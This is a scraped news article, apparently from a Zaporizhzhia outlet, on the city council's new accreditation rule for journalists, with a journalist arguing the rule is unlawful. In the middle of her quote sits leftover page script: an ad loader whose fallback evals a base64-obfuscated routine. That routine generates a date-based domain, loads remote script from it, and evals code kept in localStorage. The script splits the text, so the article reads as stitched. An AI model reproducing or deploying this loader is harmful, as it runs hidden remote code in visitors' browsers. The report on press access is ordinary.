Запорожский горсовет принял решение по допуску журналистов на сессию: почему оно незаконное

Теперь журналистов в Запорожский городской совет будут пускать только после аккредитации.

Депутаты запорожского городского совета приняли решение о введении аккредитации для представителей СМИ, желающих освещать работу городской власти.

На рассмотрение депутатам было вынесено два проекта решения. Предложение фракции «Европейская солидарность» (автор Александр Константинов — ред) о беспрепятственном доступе журналистов в здание городского совета промэрское большинство провалило. За проголосовало всего лишь 16 депутатов (фракции «ЕС», «Партии Шария» и два депутата от «Слуги народа» Пенчук и Грицай — ред.). После этого депутаты 43 голосами «за» проголосовали за проект решения авторства Сергея Ильченко и Дмитрия Серого (фракция «Єднання Владимира Буряка») об аккредитации журналистов. В мэрии говорят, что скопировали пункты положения с порядка аккредитации в Верховной Раде Украины. То есть приравняли себя к нардепам.

Согласно этому документа, перед каждым заседанием Запорожского городского журналисты должны пройти аккредитацию, при этом органы власти могут отказать в допуске представителям СМИ. Четких критериев по которым будут отбирать журналистов нет. СМИ отводится место на балконе, при этом передвигаться свободно по зданию городского совета (имущества громады города) они не имеют права. Вчера для них создали специальный проход на 4-й этаж, чтобы они не имели доступа к залу заседаний и по сути не могли общаться с депутатами и чиновниками, находящимися в сессионном зале. При этом температурного скрининга, несмотря на карантин, проведено не было.

Кроме того, такой порядок нарушает законодательство, поскольку заседания городского совета являются открытыми мероприятиями,
пишет на своей странице в Фейсбук журналистка Екатерина Рождественская. Отметим, ранее на сессии могли пройти обычные жители Запорожья по предъявлению паспорта.

«Згідно ч.1 Ст.26 ЗУ «Про інформацію» — «відсутність акредитації не може бути підставою для відмови в допуску журналіста, працівника засобу масової інформації на відкриті заходи, що проводить суб’єкт владних повноважень». var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Тобто, якщо журналістів без акредитації не будуть пускати на відкриті заходи — сесії міськради, депутатські комісії, засідання виконкому, тощо, то особи, відповідальні за цей недопуск, знову ж таки вчинятимуть злочин за статтею 171 Кримінального кодексу. Автори цього документу хибно ототожнюють акредитацію і допуск на відкриті заходи.

Також, ми знову бачимо штучне звуження допуску до будівлі міської ради до допуску лише на сесію, і про інші заходи нічого не говориться.

Норми про те, що посадовці будуть відмовляти журналістам в акредитації, якщо вирішать, що ті поводяться нечемно, є проявом страху місцевої влади перед медіа та їхньої нездатності відповідати на незручні питання.

Відтак, цей документ не вирішує нічого, не враховує інтереси стейкхолдерів, розроблений кулуарно без залучення зацікавлених сторін та призведе лише до загострення ситуації. Цим документом місцева влада лише показує своє від’ємне прагнення до прозорості та відкритості», — пишет Рождественская. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/zaporozhskij-gorsovet-prinyal-reshenie-po-dopusku-zhurnalistov-na-sessiyu/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top